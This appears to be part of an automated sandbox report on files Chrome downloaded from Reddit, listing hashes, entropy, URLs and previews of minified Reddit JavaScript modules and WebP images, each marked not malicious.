                                                  Preview:import{_ as t,n as e,I as i,ac as s,e as a,a3 as n,g as o,gE as r,u as l,v as h,aR as d,aY as c,aS as p}from"./shell-4994f581.js";import{s as u,x as g,a as m,cp as v,I as y,cq as f,aA as b,cr as I,l as x}from"./icon-4d9be652.js";import{T as w}from"./index-56e4320e.js";import{H as _}from"./club-award-confirmation-client-js-b22d6f4f.js";import{b as C,B as P}from"./index-e6388eb1.js";var S;!function(t){t.PLAIN="plain",t.MEDIA="media"}(S||(S={}));const A=12;let B=class extends u{constructor(){super(...arguments),this.pages=0,this.pageIndex=0,this.appearance=S.PLAIN,this.animationDuration=0,this.containerLabel="",this.numVisible=2,this.centerIndexPosition=3,this.setTransitionDuration=async()=>{this._dotsContainer&&(await this.updateComplete,this._dotsContainer.style.setProperty("--pagination-transition-duration",`${this.animationDuration}ms`))},this.animateInfiniteCurrentPage=t=>{if(this._currentPageIndicator){const e=[{transform:t?`translate3d(${A*this.pages}px, 0,0)`:"translate3d(-12px, 0
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (872)
                                                  Category:downloaded
                                                  Size (bytes):940
                                                  Entropy (8bit):5.170910181108421
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1C3A0A6BCECD453C6530A1CE9DF838CA
                                                  SHA1:12497BDC7AAD523F4BB1A3956AD4CF356512121F
                                                  SHA-256:BE623B52D5F81CB2DD5CD328E5BD28C22B3B9FFFF51FC980BD9FD2A08A58E2F7
                                                  SHA-512:4B019773D0DAB5534614BFD1FDA9965625573F242CE572A7954A84D1FEBF3363E8B36BECEDA3375375103F3857B529FD5F7796CD6BF6179C8D568150A048D072
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-bottom-sheet-header-b31e0ad4.js
                                                  Preview:import{_ as t,n as e,e as r}from"./shell-4994f581.js";import{s as o,x as s,a as i}from"./icon-4d9be652.js";let a=class extends o{constructor(){super(...arguments),this.hasDivider=!1,this.render=()=>s` <slot name="leading"></slot> <slot></slot> <slot name="trailing"></slot> `}static get styles(){return i`:host{align-items:center;box-sizing:border-box;display:flex;font-weight:700;height:var(--rem64);min-height:var(--rem64);padding:0 var(--spacer-md);position:relative;width:100%}:host([has-divider])::after{border-bottom:1px solid var(--color-neutral-border);bottom:0;content:'';position:absolute;right:var(--spacer-md);left:var(--spacer-md)}:host>slot:not([name]){display:flex;flex-grow:1;padding:0 var(--spacer-sm);font-size:1rem}`}};t([e({type:Boolean,reflect:!0,attribute:"has-divider"})],a.prototype,"hasDivider",void 0),a=t([r("faceplate-bottom-sheet-header")],a);.//# sourceMappingURL=faceplate-bottom-sheet-header-b31e0ad4.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4356)
                                                  Category:downloaded
                                                  Size (bytes):4400
                                                  Entropy (8bit):5.338469420590669
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C2C10E507CD02E443F1A507181C263E4
                                                  SHA1:47BC46F684835517413EE4A35CC4A7476882E20E
                                                  SHA-256:2CFF9732D4A3E03A50A5B5D8486CDED7DBE3D944CD32D148B56DED66A29B2E42
                                                  SHA-512:5FAC71306A45EFD20D9CB0E62073E05A02A9DB5748E612EF76D7723CE445390A8A4293315F1A4A087EA0A840B6DDB73692977A1719A271F25B55205ABA9B9210
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/large-7a96dec8.js
                                                  Preview:import{a3 as e,_ as t,bP as s,e as o}from"./shell-4994f581.js";import{x as r}from"./icon-4d9be652.js";import{R as a,a as i,S as n}from"./base-562ac292.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./search-input-desktop-client-js-cb5b0267.js";import"./validate-image-fc8b467a.js";import"./text-input-1c750feb.js";import"./index-169ed00b.js";import"./filterNullish-3e68f24c.js";import"./search-results-dropdown-modifier-client-js-b0d36951.js";import"./post-consume-tracker-e4186985.js";import"./links-27a3f3ef.js";import"./search-typeahead-expandable-section-1d8b2dde.js";import"./search-params-246786c0.js";import"./search-dynamic-id-564febdb.js";import"./expandable-section-header-e3f969c2.js";import"./ad-event-tracker-a5a98fc1.js";import"./with-ad-observer-5931d8eb.js";import"./ssa-parser-f2f362d6.js";import"./errors-98e883e2.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";import"./shreddit-dynamic-ad-link-fcaf1820.js";import"./sug
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):100
                                                  Entropy (8bit):4.4425921657067295
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9403C1D6B6159509E240FAA871E00E4A
                                                  SHA1:A9CAAC17BA9311F4D8C94A379811B3258C6E6C96
                                                  SHA-256:ACB1204A00A73D00656B7C4D2F5F929E8430E99D6F215A3E274F4168540BEA1D
                                                  SHA-512:EBFB8960B8399A3B9F75F15CE4C3441CC01379C8BEB9E161E49FEEA964959BDBA9C20141CF489E8A1EFA36AF1E406EB5DDE90CB3F7558038492F0F453F53E651
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.reddit.com/svc/shreddit/left-nav-recent-section
                                                  Preview: <reddit-recent-pages> <hr class="w-100 my-sm border-neutral-border-weak" /> </reddit-recent-pages>
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):2850
                                                  Entropy (8bit):7.927522907517717
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:00E24369394B8B6E5981E87FB71B03EE
                                                  SHA1:1F511F99F71E40D080C0740B3F85A063504C0EB6
                                                  SHA-256:6EA0345690D93A3B58B6C127119EA4D92B78F3A9A03847D5E4C1954C47EE5CFF
                                                  SHA-512:453B988A79C8695849C429E51BB555933DF48C671FA096A349D98B6C24C0AF0726E481385D6636493CDB6BCF36FB963E3967D9AE4E14D616E4C5FDA2A09085B2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_3oeyf/styles/communityIcon_a6wc6wasleke1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=dd83bae6c63d05f374cae1480faeb620c32524f6"
                                                  Preview:RIFF....WEBPVP8X........_.._..ALPH/......l...'...h...ln..?C.._DT..m..m.>W.m.X.m........s... ).$I..S>V...Q.!"&@.G.SL)JJq.BL.8....%$IZt./...?.t.e.....$.8.I.....F....;HR..(...o...K)...^.... )}.Q..j.K6p.VRj-i...+.....K..O.)....t..<..q.+vTl)i.g......+...Z..~.T...o...L..r....r..Z...s.6...........P.'.m...4.-H}.T..j3..d.B%:#*....D...C..{Q.M.[.Z.....*E.|....R..,/....Pl.;d.gf.u3......`G.r.*.+w...?h.G.......2.*..Q{Qm,.!.J.ls.....A..|#.\.i.5....1bD....r....t...#ZlN.\.&..l.d......[.Y..>!UHH....H.........R.w....y.P0..X....+....L1E.....I..(}.D.&...OY.......2....t.S..E..2.O.9`.w/.....!.O....+....D6..v|]Q......lL..K.%E.u.af\y..RP.IG?Ul.';......:..\..W....Kz..bC..C....I..)..`..RcAz.Tp-..S.....I....Uf.......v...*6....+.]J......b...0...t....(.....(..Y..F....N..[Y+...\k..9l..,...o...U..l.gEo...[R.A.......JQmG...?<..B...nZN.1Ei.{.@..6g.....y.jw.+.....Z.q*..6...4....H..~..".7{...M.v...b..{J.G.p.aX.........wN....a..3.W.a.%.....t.:.0.Q?%..o+..f../..!.t..=...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x180, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):16030
                                                  Entropy (8bit):7.987253193851257
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0DF3A1DDD091BE5075024B4DDA4DFB4F
                                                  SHA1:FC52C283519CBD64E5B1AFD2CCC5A90BBAD900F2
                                                  SHA-256:4F899162C5716FE2828A6D33BD91B9A7D2891A6C418FA52484B7CD18557B3214
                                                  SHA-512:384CA30D9758F4028404553E251E59A6F99999EA4EA9D259FC3F91D91DAE267B00E39B9AE48278E1C0EC0E865105B865567E9E7B8526D6EF231AB02E6C23F2C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/highlight-jalen-brunson-collides-with-ausar-thompson-and-v0-6CP-MBBLWl2aW-hy3UMydAhWSxamxScgB-3PkNsHTSQ.jpg?width=320&crop=smart&format=pjpg&auto=webp&s=9ae9843edd4b98eca028edb66bd587c978871393
                                                  Preview:RIFF.>..WEBPVP8 .>.......*@...>Q .D..!.y.8....B..h1.n....w..-.e..vC....._G.........{/.........[...w..........}....t~#.......5....'|......{.....C..........?s.....D.....G......O.+.....#..........................?.<S.1.+...........?......c.w..........{....f.J..zvW....l...Na....4Mp.e.|...../..7......V?. ...2.4.b....."....x..8...3..o......1..,#._...]N.I.U..E.foj.....pa.tJO..0*..W..R.8w.s.v.w..._..%..d!.....s.n.%. V.K..#.n0.-.V.%...W.:.^..+....Z.t...%L.y.W.R..Y,b.3.m+...eR.UU...4.W......;..=.?A....1.m..*}...Q-.......... .p..7U..[.....q.&'....1D.......W...m.|..W...o......$!......z.%). ....o...^_).mMl[...,....e..2.:.4j.-.8e..3.j..i.#w.Ge..*...V..B...].......d..L.x..<..&..w"G.S....J...f6..U.l..Cw..z.1.[.x......$\.T....I.)u\...9.G.....?......U....&...B..(...5...q..9zpQ.....!29...?.G...C<.c.=Q......=.I...9.."...k.%......<Ci.g....m...c..6i}+.,^ky..m>e...Kl.&.C..r28j#!.4..3.M...q...;G..ga..M.0...V.Eec.9...:...V(....1.......e.......&.^.......Pe
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 96x96, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1618
                                                  Entropy (8bit):7.878194315608487
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:353EC9F3A197F1AE205EB38F30E975E0
                                                  SHA1:9F89242552B9D58486A771F63F14D2BF00E31729
                                                  SHA-256:4F43605E2018AE72E2E854F801308B04689365BA037C3219412134BC2C7F2E6F
                                                  SHA-512:6DA7E8DA268D26F9B24134B27BC27A48DD64665E7D8234C5C980CF9CCA5A0A3BC47148376C38C110199D1040240B7BA586223D5A1F4153C950FC06C848117379
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2we4j/styles/communityIcon_k5n4c7i07t4d1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=91218d80e2b4db5ffbd035f2e09a1ead6917da49"
                                                  Preview:RIFFJ...WEBPVP8 >...0....*`.`.>Q".E#.!....8......?...uo..<..s>.....:W...jg.B~....b.U6...GY@...e....It..i.&.a.5..>...*Z.9:.4......_.(@+1..7f6..f..$......!.. .'\....a....3C.i.s;0....9UI...m).;..V......x.z.I.C.....#8.3MH...P..l..~.)G. ..*r.].9..Q&...(.vE..X.Z0.d@....h....d.&.`.z.(....L... ......?VL...e...*...l~..3...Uve.,..E...HDY]h.../..........B.fiIp.i.....j....kl....w..d.N.<.:7R..ym..\....^..:M.aZ<\.e.....a{~G.C.......bK........q...Hv.E....~.9.6.<.-..~.\.?....u.Q..M....S....wu....]]....isqZ.*...k..........m-...........o.5...K.wC.Y.I......']..G..T_..{B~..m..E..{..pF.,..jH]...)..y...`.Xgd|..?D...1M..g.@..5.....3g.wq.2n.....h:.y...#.FS..d`.......9....|/.}...1...X..P.fN>.1....ln@.^..#.......)........q..*].i.(..q...5hf......d.DJ.Ey.=..O......I.'4J...]@..^-^..z.Y;.@..wU...3`?NN.md.S.4....t..........a.!.6..h........Y._..G>.J..!..8.r;Y$....C.p.L........z....'....Xm..$...X.._.#.D5.......|.?....E\=.eKa...].d....M.0.8>CU.$Ta...U.F.....(x6..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1408
                                                  Entropy (8bit):7.840568800537722
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:81A61E5E7FBCA2559101B220D170F54D
                                                  SHA1:95D917716178F9085D706D27825A38CA113BB9CE
                                                  SHA-256:5DBD1A66B9CDC349A8F6375D1D3FFB7F1DCC3A424654D94B0BABA7B26AA828E9
                                                  SHA-512:B3B1FCFD93019883261C944C3A7DCD13EF7FFB53E484D91DCDE10A9DBD0245F27CC160E25575BED3315E97EB25AFE3632AF92D96E54FACA75DBEABB79D60BAC7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2qh3s/styles/communityIcon_3hssuqq28v4e1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=cd3b8e30512676345b9da6977662bbcea1b69211"
                                                  Preview:RIFFx...WEBPVP8 l........*0.0.>E..D"...l..(.D.....d.....{Oc.%[..P.....W...{........_L.............7.^..............G..._...=..;...g.....l..|5.[...G.....e.....5.....o.......n.;....p..F'C(..F.!uZ....j..:..U.....k...B...2L:.[....=%h.wP..9.........Z7~q...l&.{.,b.|k..*... ..qy.MK..7a..|hC..z.^.....]_.,.jh]....O.p.=^..V.c|z......yD_......5.<.qyc.....?.........U3..X..*.v>.|U$..H+X..D-.T..............I.....6.r.L...yA.d.u`......e./.I..m.s..c.../.......>..w..z=.).2.Y.B...Q. E..1.~V....p%M.~......<..&....x...m......n..Yw./.Iy1............oo..F8...8Ef...H.~.{..v..w~...t....w^.hx.L..].s.5v?..L.........n.A@.X^.*.d...........J./...t...a7..G.s....,;.=..D.)Hg......#..y3.....r....$.VC7.C..KayR)....}...A....xD6..8.2.h.^.<...=G.L...uA%w....W.j..t.V..$....@..'.....E.....C..Sn|{......v.ckh...AJ...Jy..../.n....S..|........"..Uj.....>|R6U."(.z.|..I........).......,q..%r.sH..9SM.>.xs.+.....N.......t.....[......[...f,......4.......d.1..l..+.*u"9W4.<$.4.o..6@..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11807)
                                                  Category:downloaded
                                                  Size (bytes):11862
                                                  Entropy (8bit):5.339645995518612
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:112C7275949FDD7BB1EE3370267C1905
                                                  SHA1:393123D3A1469BAFA0F6D450F25B159237BAD08F
                                                  SHA-256:FE32CF0E7A4C3A01F594F709A7A2B7DE97C6E371BD05AA8A17672F7C9127F9FF
                                                  SHA-512:4665EF33C6C10208E83B5E9B4F6D88E6A8DAC35771E83B0376077D1B4019E91C1FD440241803069A11529A1A553F1FB3456EB670A87BABEADC246B9702954011
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/pdp-ad-client-js-d703e7d3.js
                                                  Preview:import{A as t,gm as e,f0 as s,fP as i,_ as r,n as o,e as n,as as a,P as d,dz as l,ah as h,c as p,J as c,T as m,H as u,bD as y,b_ as b,gn as g,go as v,at as k}from"./shell-4994f581.js";import{x as f,D as j,ba as I}from"./icon-4d9be652.js";import{s as A,a as E}from"./activate-lead-gen-dialog-5e20bf34.js";import"./click-location-tracker-32ee9eb3.js";import{g as S,a as C,s as x,b as w}from"./shreddit-dynamic-ad-link-fcaf1820.js";import{W as U,e as B}from"./with-ad-observer-5931d8eb.js";import{c as T,I as L}from"./content-action-button-5fdf727f.js";import{bP as O,a7 as G}from"./club-award-confirmation-client-js-b22d6f4f.js";import{S as D}from"./partial-feed-post-client-js-9de4a8bc.js";import{G as R}from"./links-27a3f3ef.js";import{h as P}from"./gallery-74f99861.js";import"./ssa-parser-f2f362d6.js";import"./errors-98e883e2.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";import"./mod-log-takedown-preview-client-js-13462cf3.js";import"./shop-gallery-dat
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2665)
                                                  Category:downloaded
                                                  Size (bytes):2726
                                                  Entropy (8bit):5.242765334059463
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CF0BA4C89616DF06450022E8D7A309D1
                                                  SHA1:B9603C049D6F5208D20ADE3F0F895D7FA5B73CA5
                                                  SHA-256:FB97A336103D57815C02CA2C5A72BBE7CBF8B6759D4947DE21D83A5016D8E0E9
                                                  SHA-512:0F77F8FF3D83A8A174D4046E8BBCDCDD66C32D4ABEE0BE90728D850C41DB0819F7607FC25945152A377EDFF21690299C92FA8E7357E681D081DD8BA2F9265BB9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/auth-overlay-client-js-6253058a.js
                                                  Preview:import"./guides-telemetry-aee80adb.js";import{t,_ as e,n as s,g as i,E as o,bk as a,c as n,s as r,e as l,r as h}from"./shell-4994f581.js";import{S as c}from"./scroll-blocker-9486e9a9.js";import{O as p,J as d}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as u,A as m,x as f,l as g}from"./icon-4d9be652.js";let y=h,b=window.location,k=class extends u{constructor(){super(...arguments),this.stepName=null,this.isStandalonePage=!1,this.open=!1,this.history=[],this.events=new o(this),this.scrollBlocker=new c(this),this.findStepElement=t=>this.querySelector(`[slot="${t}"]`),this.requestClose=()=>{this.blocking?this.isStandalonePage&&this.redirectToHome():this.close()},this.redirectToHome=()=>{b.href=location.origin},this.handleEscKey=this.events.define("keydown",(t=>{"Escape"!==t.key||this.blocking||this.close()})),this.deprecated__onFaceplateTrack=this.events.define("faceplate-track",(t=>{const{source:e,action:s,noun:i}=t.detail;e===p&&s===d&&a.has(i)&&this.requestClose()}))}ge
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5016)
                                                  Category:downloaded
                                                  Size (bytes):5017
                                                  Entropy (8bit):5.097609877520318
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:34922A93179D5394AC8B99919008AC14
                                                  SHA1:2D8D4F764284E9574D8F9C883D9F6DDFA7E84338
                                                  SHA-256:CDFA8C572C5C289A1EA39B6C3BEBA8DA5466F3A268EF6354BF3CFB82EF29933B
                                                  SHA-512:431713D9153BE5111E7DBD3868BCDE30614B77DAD7D9D26BC1C20F26257AF369F8000D5B5D379C073B8C41E38D9E71B7D05F7C655A4F08C2648379BB5F7899C1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.reddit.com/sw.js
                                                  Preview:function t(t){return new Promise(((e,n)=>{t.oncomplete=t.onsuccess=()=>e(t.result),t.onabort=t.onerror=()=>n(t.error)}))}let e;function n(){return e||(e=function(e,n){const i=indexedDB.open(e);i.onupgradeneeded=()=>i.result.createObjectStore(n);const a=t(i);return(t,e)=>a.then((i=>e(i.transaction(n,t).objectStore(n))))}("keyval-store","keyval")),e}function i(e,i=n()){return i("readonly",(n=>t(n.get(e))))}function a(e,i,a=n()){return a("readwrite",(n=>(n.put(i,e),t(n.transaction))))}const o="v2_event_boiler_plate",s="disable_pns",r=async t=>{const e={headers:{"Content-Type":"application/json"},method:"POST",body:JSON.stringify({info:t})};try{await fetch("/svc/shreddit/events",e)}catch(t){console.error(t)}},c={},d=(t,e=self)=>{const n=t.source?.id;c[n]={};const{v2EventBoilerPlate:i,disablePNs:r}=t.data;i&&a(o,JSON.stringify(i)),a(s,JSON.stringify(r)),t.waitUntil((async t=>{const e=await t.clients.matchAll({includeUncontrolled:!0,type:"window"}),n=new Set(e.filter((t=>!!t)).map((t=>t.id))
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6977)
                                                  Category:downloaded
                                                  Size (bytes):7038
                                                  Entropy (8bit):5.13859702809868
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5A9C4035ECE4B0DEB6C360C901B77877
                                                  SHA1:E65282D1641C790BF349C8E2943CDB57379783ED
                                                  SHA-256:12D2693E5D1B60F206F332C592974FCE816BA29B9A8280B5306E5C989B5DB7B4
                                                  SHA-512:F3AB15C7C3811B9A9B1173D4FAA770B39C66F8735D5D88915785A72ADA11DE440D63AB7EB56D08369E3C695D5E42C6E8E7B9FAAB14B47A5B0D8A84ED3F980503
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/header-large-client-js-8583a096.js
                                                  Preview:import{a as e,_ as t,n as s,e as i,E as n,cz as a,cA as r,cv as o,cw as l,cP as h,c,H as d,cu as u,t as g,r as m,cQ as p}from"./shell-4994f581.js";import{s as w,x as v}from"./icon-4d9be652.js";import{G as D}from"./google-api-d2fdd9a3.js";import{as as y}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./pdp-back-button-308ac1d1.js";const b=e(w),E=e=>{e.preventDefault()};let M=class extends b{constructor(){super(...arguments),this.isHamburgerMenuIncluded=!1,this.isLoggedIn=!1,this.showAccountManagerModal=!1,this.hamburgerMenuButton=null,this.menuDialog=null,this.loginButton=void 0,this.shredditInteractableElement=null,this.search=null,this.userDrawerButton=null,this.userDrawerMenu=null,this.userDrawerContent=null,this.userDrawerLoginButton=null,this.advertiseButton=null,this.recapCampaignLink=void 0,this.mScreenMediaQueryList=window.matchMedia?.("(min-width: 1200px)"),this.cachedIsHamburgerMenuShown=!(this.mScreenMediaQueryList?.matches??1),this.events=new n(this),this.google
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (7005)
                                                  Category:downloaded
                                                  Size (bytes):7064
                                                  Entropy (8bit):5.295755673426134
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9E59EB39FEA3F98A78C6C300E9A623A7
                                                  SHA1:D10CDE7202733C8DCD7627392746A1ABA65E574F
                                                  SHA-256:6D3D9629B56214AE1C1C150A4487075612C993A16A525CC3EAC3DD0D852D9ABB
                                                  SHA-512:0EDBEFC13B28E8DA0DB75A2A083E8E47D0132FD0EAE573C4EA99136246569884626BBA289D8E33E6F139E1DD4D61B8DACE463971BB99A7AC446189AC3F4B04D4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/sidebar-ad-client-js-a1fc0d15.js
                                                  Preview:import{as as e,ar as t,t as i,A as s,c as r,l as n,L as o,at as a,_ as d,n as l,e as p}from"./shell-4994f581.js";import{x as h,l as c,s as u}from"./icon-4d9be652.js";import{a as b}from"./ui-strings-aad5fab2.js";import{s as y}from"./shreddit-dynamic-ad-link-fcaf1820.js";import{W as v,e as m}from"./with-ad-observer-5931d8eb.js";import{cJ as k,cc as f,S}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./ssa-parser-f2f362d6.js";import"./errors-98e883e2.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";const B=v(u);let g=class extends B{constructor(){super(...arguments),this.impressionId="0",this.isBTFPlacement=!1,this.isBlank=!1,this.url="",this.randomHouseAdIndex=0,this.outboundLinkUrl="",this.placement=e.SIDEBARS,this.isLargeBanner=!1,this.hasBrandUnsafeContent=!1,this.showBrandSafeContent=!1,this.visible=!0,this.serverSideRendered=!1,this.adType=t.DISPLAY,this.isPixelFiringRefactorExperimentEnabled=!1,this._brandUnsafePostIds=new Set,th
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1180
                                                  Entropy (8bit):7.762584068121085
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2F63F34A9E1AB274FEDD4CE9A9E0468E
                                                  SHA1:625F152FC88CB916FF75967A37FC3E4F17E15CEC
                                                  SHA-256:302434C9606DB4BE4924FE94CB890FBA904F44A2B4E2D844464267754169C8C4
                                                  SHA-512:2AB32EFFD78E25EE2D04D0EDDAF215BBFE2FECB10BC22DFF368A3FB9803D522D67B02096B42269AF86115532B54166CFA9D4014956F2848D3E6049E7CF484F6A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_4uoy2u/styles/communityIcon_l4hwets9e0cd1.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=df34b22282abcd744996c325825697b55245c3a9"
                                                  Preview:RIFF....WEBPVP8 .........*0.0.>A..D"...n..(....N.B:..?...:.....m............t..........]`...V.._.......u..}....~.........OqO...,....x..{.O.?.?n...j........./......h..t...I.~..;..q...f..-&.j.3}H./u.C,.>.!@...Rj. _. ...p.....Z&.%o....O....!HkRf'.=/..a..6.e.8x..P.o....,<.%.Y.6.{h.~~^. ...]..6>v.w..)..u...G;#..1O....-Pv.]..G.5....-.V...[0-?..++$..D....t.:..'..N..P?..&..t.0.d ...~..i..S........\.....=..Bbf.?b.v.y..*.....r....n]#..`t.I..W.VT.8....lE...g........XU....!>1'3..v...<=.....$'.)....._.J.....{[:v....w.1...L\J......g......NJ.N...@..(..O....$..fdq....Q.....@Ik..U.....j.S..M^N..n&._.->".{......tw..^P...h.y.-^....U.J....d...xqo!.2..gF.HC.ri....\.QMXx...-_of.f.!.0}/......e.s.v../.y[V..n...p.....[;.X.../!K.....?3..r{......Z..kd..._...k.CL.9?..<P...t....@Z.bm........n..Z.A$Fch.."E_.g.D.[........rtq-&...>......>.Mm.V.v....M..wMZs.^...!\.\......cY_.17.:...e.....~..{....!...j%k..H.Y.w'......08T.Y...L.u..?.......9f.q.j..b..*..d$0_<[...k.h...1..5.Jd
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x213, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):14258
                                                  Entropy (8bit):7.9857201376426525
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1668381788BFB6A64F668AF89227E78B
                                                  SHA1:26DA73F065F2FEDB33E7BF30539C0311A3FD57E7
                                                  SHA-256:49876BC0640B510E962E6A2092397CD3D40F13EFB4C48618F98E55F016166297
                                                  SHA-512:596EA5468F65446ACB47A7B74AF3A9238A1A14C6031ED9E21D66F8AC7B8D15819249489DA43B788981A3A6E5C564FBFD7A832198AF30B43F57F69E9AE697E559
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/us-imposes-tariffs-up-to-3-521-on-southeast-asia-solar-v0-yfEQnukeFZZjzWGUB-QnxwYtVhfOGG6ne0-09Smf18U.jpg?width=320&crop=smart&auto=webp&s=d3b66a09afcac7f01a0cafb6db4ee0546e65eb8d
                                                  Preview:RIFF.7..WEBPVP8 .7.......*@...>Q".D..!....8..............G.....#d....~....{......W.w...............z_.e..#.e.?..{......./........_.~....K./.?....3?.{.}.......w._..~.};........%......P.....G...........~.{....'.......................=Oh../..4.~.]....`L.V..E..g!......}.[..c..z.M.K...y..^.|\...\'G).cN=../..`.uO<..%........,Z.?rL..ua..'.6].S?.Z.%S... .}.{_C...>?..SU...3=.}...Z.Er..l.(<.M.........ZZ.Y.+..v5.v.,@.0.!f.....c.....=..g...#1../....eM.n......E.r.e?......O.R....<..xN.,.)k.PN.6.J-o..\..............J......snY..7.w.?1Z*6..o....{.iq.;WFi...^........QH.b.I.&{|..kq`....ZVD.^'.e....b;.d......6..?H8+5...U{..l......E..f.1,.Z..Q.2T`^7.Fs.....{..K.'.Q..2}.jrY.ar.....X........9...'..pN..+.F_dt9t....$.f.(0Xv~ 0{....#....f....8Y...4..T9.U...\............=..*...Sh..N...{y...0..6_e\......,..b^..nxW.7..{Y....i.-..~o.D.x`/....*..J5.w........qF.u#.....\...n.Nk..Q...)s..i2.0.R.._.......i..NzA......Sb.......S).../..-M..........Y...46.#H..?h....p.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (902)
                                                  Category:downloaded
                                                  Size (bytes):952
                                                  Entropy (8bit):5.37061571400298
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4ABE68840E97EEA7B791789805623619
                                                  SHA1:6A196A3F44065FE71318F593B6863A204451350D
                                                  SHA-256:E17C69BDA5ABE7E3AC38173CA137625AEF04E969402256467126DA5648F7519C
                                                  SHA-512:6BFF811A51E4D439BF6BBAD1D77026EF0F8DE3DBEE2B4AC78FAE9288E58E96561111DC21960819EE330F657241885F068CD5A9E6BCC10EBAADCB663F21BBFCD9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-verdict-9fb8e844.js
